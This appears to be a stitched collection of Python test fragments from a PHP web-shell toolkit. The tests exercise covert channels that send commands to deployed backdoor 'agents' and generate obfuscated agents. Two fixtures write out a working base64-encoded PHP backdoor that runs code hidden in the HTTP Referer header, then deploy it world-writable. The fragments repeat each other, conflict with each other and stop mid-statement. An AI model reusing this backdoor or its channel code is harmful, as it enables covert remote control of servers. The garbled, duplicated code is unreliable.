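def test_generators(self):
    """Generate, deploy and load 500 randomised agents, removing each one.

    Each iteration writes a newly generated agent to ``self.path`` and
    builds a ``Channel`` for it.  Removal happens in a ``finally`` clause so
    a failing iteration cannot leave the generated agent file behind.
    """
    for _ in range(0, 500):
        self._randomize_bd()
        obfuscated = generate(self.password)
        save_generated(obfuscated, self.path)
        try:
            self.channel = Channel(self.url, self.password)
        finally:
            # Always delete the deployed agent, even if the channel
            # could not be created.
            self._clean_bd()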
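class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against the agent at ``url``."""

    url = config.base_url + '/test_channels/legacycookie_php.php'

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel('LegacyCookie', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'),
            ('User-Agent', 'CLIENT'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        # Raw strings: the backslashes belong to the regex, not to Python.
        # The user cookies must appear between other cookie pairs.
        self.assertRegexpMatches(
            headers_string,
            r'\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+'
        )
        self.assertRegexpMatches(headers_string, r'\[User-Agent\] => CLIENT')
        self.assertRegexpMatches(headers_string, r'\[X-Other-Cookie\] => OTHER')

        self.channel.channel_loaded.additional_headers = []

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyCookie', {'url': url, 'password': '******'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))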
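def setUp(self):
    """Build a StegaRef channel aimed at an HTTPS URL addressed by bare IP.

    The test is skipped when no IP is available; returning silently would
    leave ``self.channel`` unset for the test that follows.
    """
    ip = _get_google_ip()
    if not ip:
        self.skipTest('no IP address available for the certificate test')

    url = 'https://%s/nonexistent' % (ip)
    self.channel = Channel('StegaRef', {'url': url, 'password': '******'})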
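class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against the agent at ``url``."""

    url = config.base_url + '/test_channels/legacyreferrer.php'
    password = '******'

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel('LegacyReferrer', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'),
            ('Referer', 'REFERER'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string)
        # NOTE(review): the header set above is 'REFERER' but the check
        # looks for 'REFERER1'; confirm which value was meant.
        self.assertNotIn('REFERER1', headers_string)
        self.assertIn('[X-Other-Cookie] => OTHER', headers_string)

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyReferrer', {'url': url, 'password': '******'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))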
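class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against an agent generated per class."""

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel('LegacyCookie', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Generate a ``legacycookie_php`` agent and save it at ``cls.path``."""
        cls._randomize_bd()
        obfuscated = generate(cls.password, agent='legacycookie_php')
        save_generated(obfuscated, cls.path)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            # NOTE(review): the command template from `config` is run
            # through a shell; keep the template and `cls.path` trusted.
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4;'),
            ('User-Agent', 'CLIENT'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        # Raw strings: the backslashes belong to the regex, not to Python.
        self.assertRegexpMatches(
            headers_string,
            r'\[Cookie\] => [A-Z0-9]+=[^ ]{2}; C1=F1; C2=F2; C3=F3; C4=F4(; [A-Z0-9]+=[^ ]+)+'
        )
        self.assertRegexpMatches(headers_string, r'\[User-Agent\] => CLIENT')
        self.assertRegexpMatches(headers_string, r'\[X-Other-Cookie\] => OTHER')

        self.channel.channel_loaded.additional_headers = []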
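def test_generators(self):
    """Generate, deploy and load 100 randomised agents, removing each one.

    Each iteration writes a newly generated agent to ``self.path`` and
    builds a StegaRef ``Channel`` for it.  Removal happens in a ``finally``
    clause so a failing iteration cannot leave the agent file behind.
    """
    for _ in range(0, 100):
        self._randomize_bd()
        obfuscated = generate(self.password)
        save_generated(obfuscated, self.path)
        try:
            self.channel = Channel('StegaRef', {
                'url': self.url,
                'password': self.password
            })
        finally:
            # Always delete the deployed agent, even if the channel
            # could not be created.
            self._clean_bd()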
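def test_wrong_cert(self):
    """Check that a request to an HTTPS URL addressed by IP does not raise.

    NOTE(review): the URL uses a bare IP, so the server certificate
    presumably cannot match it; a pass means the channel tolerates that.
    Confirm this is the intended behaviour.
    """
    ip = _get_google_ip()
    if not ip:
        # Report the missing precondition instead of passing silently.
        self.skipTest('no IP address available for the certificate test')

    url = 'https://%s/nonexistent' % (ip)
    channel = Channel('LegacyCookie', {'url': url, 'password': '******'})
    try:
        channel.send('echo("1");')
    except Exception as e:
        self.fail("LegacyCookie test_wrong_cert exception\n%s" % (str(e)))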
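def test_generators(self):
    """Generate 100 randomised agents and round-trip payloads through each.

    Each iteration deploys a new agent at ``self.path``, opens an ObfPost
    channel and runs the incremental echo check.  Removal happens in a
    ``finally`` clause so a failed assertion cannot leave the agent file
    behind.
    """
    for _ in range(0, 100):
        self._randomize_bd()
        obfuscated = generate(self.password)
        save_generated(obfuscated, self.path)
        try:
            self.channel = Channel('ObfPost', {
                'url': self.url,
                'password': self.password
            })
            self._incremental_requests(10, 100, 30, 50)
        finally:
            # Always delete the deployed agent, pass or fail.
            self._clean_bd()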
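class TestGenerators(TestCase):
    """Deploy freshly generated agents and open a StegaRef channel to each."""

    def test_generators(self):
        """Generate, deploy and load 100 randomised agents, removing each one."""
        for _ in range(0, 100):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)
            try:
                self.channel = Channel('StegaRef', {
                    'url': self.url,
                    'password': self.password
                })
            finally:
                # Always delete the deployed agent so a failing iteration
                # cannot leave the file behind.
                self._clean_bd()

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def _randomize_bd(cls):
        """Pick a random password and derive the agent URL and file path."""
        cls.password = utils.strings.randstr(10)
        # The MD5 digest that used to be computed here was never read and
        # has been dropped.
        # NOTE(review): the password is part of the file name, so it shows
        # up wherever the URL or path is recorded; fine only for throwaway
        # test credentials.
        filename = '%s_%s.php' % (__name__, cls.password)
        cls.url = os.path.join(base_url, 'generators', filename)
        cls.path = os.path.join(base_folder, 'generators', filename)

    @classmethod
    def _clean_bd(cls):
        """Delete the agent file at ``cls.path``."""
        os.remove(cls.path)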
def setup(self): """Instauration of the PHP channel. Returns the module status.""" # Return if already set. This check has to be done due to # the slack initialization in run() if self.channel: return # Try a single channel if is manually set, else # probe every the supported channel from config if self.session.get('channel'): channels = [self.session['channel']] else: channels = config.channels for channel_name in channels: channel = Channel(url=self.session['url'], password=self.session['password'], channel_name=channel_name) status = self._check_interpreter(channel) if status == Status.RUN: self.session['channel'] = channel_name self.channel = channel break log.debug('PHP setup %s %s' % ('running' if status == Status.RUN else 'failed', 'with %s channel' % (channel_name) if status == Status.RUN else '')) return status
def setup(self):
    """Bring up the PHP channel and return the resulting module status."""
    # A channel stored in the session is tried alone; otherwise every
    # channel listed in the configuration is probed in order.
    channels = ([self.session['channel']]
                if self.session.get('channel') else config.channels)

    for channel_name in channels:
        channel = Channel(channel_name=channel_name, session=self.session)
        status = self._check_interpreter(channel)

        if status != Status.RUN:
            continue

        # First working channel wins and is remembered in the session.
        self.session['channel'] = channel_name
        self.channel = channel
        break

    # NOTE(review): with an empty channel list `status` and `channel_name`
    # are never bound, so the lines below raise.
    running = status == Status.RUN
    outcome = 'running' if running else 'failed'
    detail = 'with %s channel' % (channel_name) if running else ''
    log.debug('PHP setup %s %s' % (outcome, detail))

    return status
class StegaRefChannel(BaseTest):
    """Shared fixture and helper for StegaRef channel tests."""

    def setUp(self):
        """Create a fresh StegaRef channel for every test."""
        options = {'url': self.url, 'password': self.password}
        self.channel = Channel('StegaRef', options)

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            echoed = self.channel.send('echo("%s");' % payload)[0]
            self.assertEqual(echoed, payload)
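def test_generators(self):
    """Generate, deploy and load 500 randomised agents, removing each one.

    Each iteration writes a newly generated agent to ``self.path`` and
    builds a StegaRef ``Channel`` for it.  Removal happens in a ``finally``
    clause so a failing iteration cannot leave the agent file behind.
    """
    for _ in range(0, 500):
        self._randomize_bd()
        obfuscated = generate(self.password)
        save_generated(obfuscated, self.path)
        try:
            self.channel = Channel(self.url, self.password, 'StegaRef')
        finally:
            # Always delete the deployed agent, even if the channel
            # could not be created.
            self._clean_bd()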
def setUp(self):
    """Create a fresh ObfPost channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('ObfPost', options)
def setUp(self):
    """Create a fresh LegacyReferrer channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('LegacyReferrer', options)
def setUp(self):
    """Create a fresh LegacyCookie channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('LegacyCookie', options)
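class StegaRefChannelWrongCert(BaseTest):
    """Check StegaRef against an HTTPS URL addressed by bare IP."""

    def setUp(self):
        """Build the channel, or skip the test when no IP is available.

        Returning silently would leave ``self.channel`` unset, and the test
        would then fail on the missing attribute rather than on the channel.
        """
        ip = _get_google_ip()
        if not ip:
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        self.channel = Channel('StegaRef', {'url': url, 'password': '******'})

    def test_wrong_cert(self):
        """Check that sending over the channel does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        try:
            self.channel.send('echo("1");')
        except Exception as e:
            self.fail("test_wrong_cert exception\n%s" % (str(e)))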
def setUp(self):
    """Create a fresh StegaRef channel from the class URL and password."""
    options = {'url': self.url, 'password': self.password}
    self.channel = Channel('StegaRef', options)
def setUp(self):
    """Create a StegaRef channel aimed at the ``stegaref.php`` test agent."""
    agent_url = config.base_url + '/test_channels/stegaref.php'
    options = {'url': agent_url, 'password': self.password}
    self.channel = Channel('StegaRef', options)
def _instantiate_channel(self):
    """Create ``self.channel`` from the session unless one already exists.

    Called from both setup() and run() so that the channel is instantiated
    lazily, on first use.
    """
    if not self.channel:
        session = self.session
        self.channel = Channel(url=session['url'],
                               password=session['password'],
                               channel_name=session['channel'])
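class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel(self.url, self.password, 'LegacyReferrer')

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyReferrer agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip() != config.script_folder_expected_perms):
            raise DevException(
                "Error: give to the http user full permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: PHP agent stub, deployed for this class only and
        # removed again in tearDownClass.
        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)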
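def test_wrong_cert(self):
    """Check that a request to an HTTPS URL addressed by IP does not raise.

    NOTE(review): the URL uses a bare IP, so the server certificate
    presumably cannot match it; a pass means the channel tolerates that.
    Confirm this is the intended behaviour.
    """
    ip = _get_google_ip()
    if not ip:
        # Report the missing precondition instead of passing silently.
        self.skipTest('no IP address available for the certificate test')

    url = 'https://%s/nonexistent' % (ip)
    channel = Channel('LegacyReferrer', {'url': url, 'password': 'none'})
    try:
        channel.send('echo("1");')
    except Exception as e:
        self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))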
class StegaRefChannel(BaseTest):
    """Shared fixture and helper for StegaRef channel tests."""

    def setUp(self):
        """Create a fresh StegaRef channel for every test."""
        url, password = self.url, self.password
        self.channel = Channel(url, password, 'StegaRef')

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            echoed = self.channel.send('echo("%s");' % payload)[0]
            self.assertEqual(echoed, payload)
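def setUp(self):
    """Build a StegaRef channel aimed at an HTTPS URL addressed by bare IP.

    The test is skipped when no IP is available; returning silently would
    leave ``self.channel`` unset for the test that follows.
    """
    ip = _get_google_ip()
    if not ip:
        self.skipTest('no IP address available for the certificate test')

    url = 'https://%s/nonexistent' % (ip)
    self.channel = Channel('StegaRef', {'url': url, 'password': 'none'})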
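class StegaRefChannelWrongCert(BaseTest):
    """Check StegaRef against an HTTPS URL addressed by bare IP."""

    def setUp(self):
        """Build the channel, or skip the test when no IP is available.

        Returning silently would leave ``self.channel`` unset, and the test
        would then fail on the missing attribute rather than on the channel.
        """
        ip = _get_google_ip()
        if not ip:
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        self.channel = Channel('StegaRef', {'url': url, 'password': 'none'})

    def test_wrong_cert(self):
        """Check that sending over the channel does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        try:
            self.channel.send('echo("1");')
        except Exception as e:
            self.fail("test_wrong_cert exception\n%s" % (str(e)))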
class ObfPostChannel(BaseTest):
    """Shared fixture and helper for ObfPost channel tests."""

    def setUp(self):
        """Create a fresh ObfPost channel for every test."""
        options = {'url': self.url, 'password': self.password}
        self.channel = Channel('ObfPost', options)

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.  The
        payload is decoded as UTF-8 before being placed in the command.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            command = 'echo("%s");' % payload.decode('utf-8')
            self.assertEqual(self.channel.send(command)[0], payload)
class BaseStegaRefChannel(BaseTest):
    """Shared fixture and helper for tests against ``stegaref.php``."""

    def setUp(self):
        """Create a StegaRef channel aimed at the ``stegaref.php`` test agent."""
        agent_url = config.base_url + '/test_channels/stegaref.php'
        options = {'url': agent_url, 'password': self.password}
        self.channel = Channel('StegaRef', options)

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            echoed = self.channel.send('echo("%s");' % payload)[0]
            self.assertEqual(echoed, payload)
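class TestGenerators(TestCase):
    """Deploy freshly generated agents and round-trip payloads over ObfPost."""

    def test_generators(self):
        """Generate 100 randomised agents and run the echo check on each."""
        for _ in range(0, 100):
            self._randomize_bd()
            obfuscated = generate(self.password)
            save_generated(obfuscated, self.path)
            try:
                self.channel = Channel('ObfPost', {
                    'url': self.url,
                    'password': self.password
                })
                self._incremental_requests(10, 100, 30, 50)
            finally:
                # Always delete the deployed agent so a failed assertion
                # cannot leave the file behind.
                self._clean_bd()

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def _randomize_bd(cls):
        """Pick a random password and derive the agent URL and file path."""
        cls.password = utils.strings.randstr(10)
        # The MD5 digest that used to be computed here was never read and
        # has been dropped.
        # NOTE(review): the password is part of the file name, so it shows
        # up wherever the URL or path is recorded; fine only for throwaway
        # test credentials.
        filename = '%s_%s.php' % (__name__, cls.password)
        cls.url = os.path.join(base_url, 'generators', filename)
        cls.path = os.path.join(base_folder, 'generators', filename)

    @classmethod
    def _clean_bd(cls):
        """Delete the agent file at ``cls.path``."""
        os.remove(cls.path)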
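def test_generators(self):
    """Generate 100 randomised agents and round-trip payloads through each.

    Each iteration deploys a new agent at ``self.path``, opens an ObfPost
    channel and runs the incremental echo check.  Removal happens in a
    ``finally`` clause so a failed assertion cannot leave the agent file
    behind.
    """
    for _ in range(0, 100):
        self._randomize_bd()
        obfuscated = generate(self.password)
        save_generated(obfuscated, self.path)
        try:
            self.channel = Channel('ObfPost', {
                'url': self.url,
                'password': self.password
            })
            self._incremental_requests(10, 100, 30, 50)
        finally:
            # Always delete the deployed agent, pass or fail.
            self._clean_bd()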
class BaseDefaultChannel(BaseTest):
    """Shared fixture and helper for tests using the default channel."""

    def setUp(self):
        """Create a fresh channel from the class URL and password."""
        url, password = self.url, self.password
        self.channel = Channel(url, password)

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = randstr(size)
            echoed = self.channel.send('echo("%s");' % payload)[0]
            self.assertEqual(echoed, payload)
def run(self):
    """Add an entry point to ``channels`` beside the session file.

    Returns:
        A confirmation string naming the URL and password that were added.
    """
    session_dir = os.path.dirname(self.session['path'])
    cchannel = os.path.join(session_dir, "channels")

    url = self.args["url"]
    password = self.args["password"]
    Channel.add_to_chan(url, password, cchannel)

    # NOTE(review): the confirmation echoes the password in clear text, so
    # it ends up wherever this return value is printed or logged.
    return "Entry point " + url + ":" + password + " added"
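class LegacyReferrerChannel(BaseTest):
    """Exercise the LegacyReferrer channel against an agent deployed per class."""

    def setUp(self):
        """Create a fresh LegacyReferrer channel for every test."""
        self.channel = Channel('LegacyReferrer', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Deploy the fixed LegacyReferrer agent fixture at ``cls.path``.

        Raises:
            DevException: if ``config.script_folder`` does not report the
                expected permissions.
        """
        if config.debug:
            stream_handler.setLevel(logging.DEBUG)
        else:
            stream_handler.setLevel(logging.INFO)

        cls._randomize_bd()
        cls.password = '******'

        # Check `config.script_folder` permissions, comparing just the
        # last 3 digits
        # NOTE(review): the command templates from `config` are run through
        # a shell; keep the templates and interpolated paths trusted.
        if (subprocess.check_output(
                config.cmd_env_stat_permissions_s % (config.script_folder),
                shell=True).strip()[-3:]
                != config.script_folder_expected_perms[-3:]):
            raise DevException(
                "Error: give the required permissions to the folder \'%s\'"
                % config.script_folder)

        # Test fixture: PHP agent stub, deployed for this class only and
        # removed again in tearDownClass.
        obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""

        tmp_handler, tmp_path = tempfile.mkstemp()
        # mkstemp() returns an open descriptor; close it so it is not leaked.
        os.close(tmp_handler)
        save_generated(obfuscated, tmp_path)
        subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
                              shell=True)

        # NOTE(review): mode 0777 makes the deployed file world-writable;
        # acceptable only in a disposable test environment.
        subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
                              shell=True)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
            ('Cookie', 'C1=F1; C2=F2; C3=F3; C4=F4'),
            ('Referer', 'REFERER'),
            ('X-Other-Cookie', 'OTHER')
        ]
        headers_string = self.channel.send('print_r(getallheaders());')[0]

        self.assertIn('[Cookie] => C1=F1; C2=F2; C3=F3; C4=F4', headers_string)
        # NOTE(review): the header set above is 'REFERER' but the check
        # looks for 'REFERER1'; confirm which value was meant.
        self.assertNotIn('REFERER1', headers_string)
        self.assertIn('[X-Other-Cookie] => OTHER', headers_string)

    def test_wrong_cert(self):
        """Check that a request to an HTTPS URL addressed by IP does not raise.

        NOTE(review): the URL uses a bare IP, so the server certificate
        presumably cannot match it; a pass means the channel tolerates that.
        Confirm this is the intended behaviour.
        """
        ip = _get_google_ip()
        if not ip:
            # Report the missing precondition instead of passing silently.
            self.skipTest('no IP address available for the certificate test')

        url = 'https://%s/nonexistent' % (ip)
        channel = Channel('LegacyReferrer', {'url': url, 'password': 'none'})
        try:
            channel.send('echo("1");')
        except Exception as e:
            self.fail("LegacyReferrer test_wrong_cert exception\n%s" % (str(e)))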
def run(self):
    """Remove an entry point from ``channels`` beside the session file.

    Returns:
        A confirmation string naming the URL that was removed.
    """
    session_dir = os.path.dirname(self.session['path'])
    cchannel = os.path.join(session_dir, "channels")

    url = self.args["url"]
    Channel.del_from_chanFile(url, cchannel)

    return "Entry point " + url + " removed"
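class LegacyCookieChannel(BaseTest):
    """Exercise the LegacyCookie channel against an agent generated per class."""

    def setUp(self):
        """Create a fresh LegacyCookie channel for every test."""
        self.channel = Channel('LegacyCookie', {
            'url': self.url,
            'password': self.password
        })

    def _incremental_requests(self, size_start, size_to, step_rand_start,
                              step_rand_to):
        """Echo random payloads of growing size and check the round trip.

        Sizes run from ``size_start`` up to (not including) ``size_to``; the
        step is drawn once from ``[step_rand_start, step_rand_to]``.
        """
        step = random.randint(step_rand_start, step_rand_to)
        for size in range(size_start, size_to, step):
            payload = utils.strings.randstr(size)
            self.assertEqual(
                self.channel.send('echo("%s");' % payload)[0], payload)

    @classmethod
    def setUpClass(cls):
        """Generate a ``legacycookie_php`` agent and save it at ``cls.path``."""
        cls._randomize_bd()
        obfuscated = generate(cls.password, agent='legacycookie_php')
        save_generated(obfuscated, cls.path)

    @classmethod
    def tearDownClass(cls):
        """Remove the deployed agent file if it is still present."""
        # Check the agent presence, could be already deleted
        if os.path.isfile(cls.path):
            # NOTE(review): the command template from `config` is run
            # through a shell; keep the template and `cls.path` trusted.
            subprocess.check_call(config.cmd_env_remove_s % cls.path,
                                  shell=True)

    def test_1_100_requests(self):
        self._incremental_requests(1, 100, 1, 2)

    def test_100_1000_requests(self):
        self._incremental_requests(100, 1000, 10, 20)

    def test_additional_headers(self):
        """Check how user-supplied headers show up in the server's view."""
        self.channel.channel_loaded.additional_headers = [
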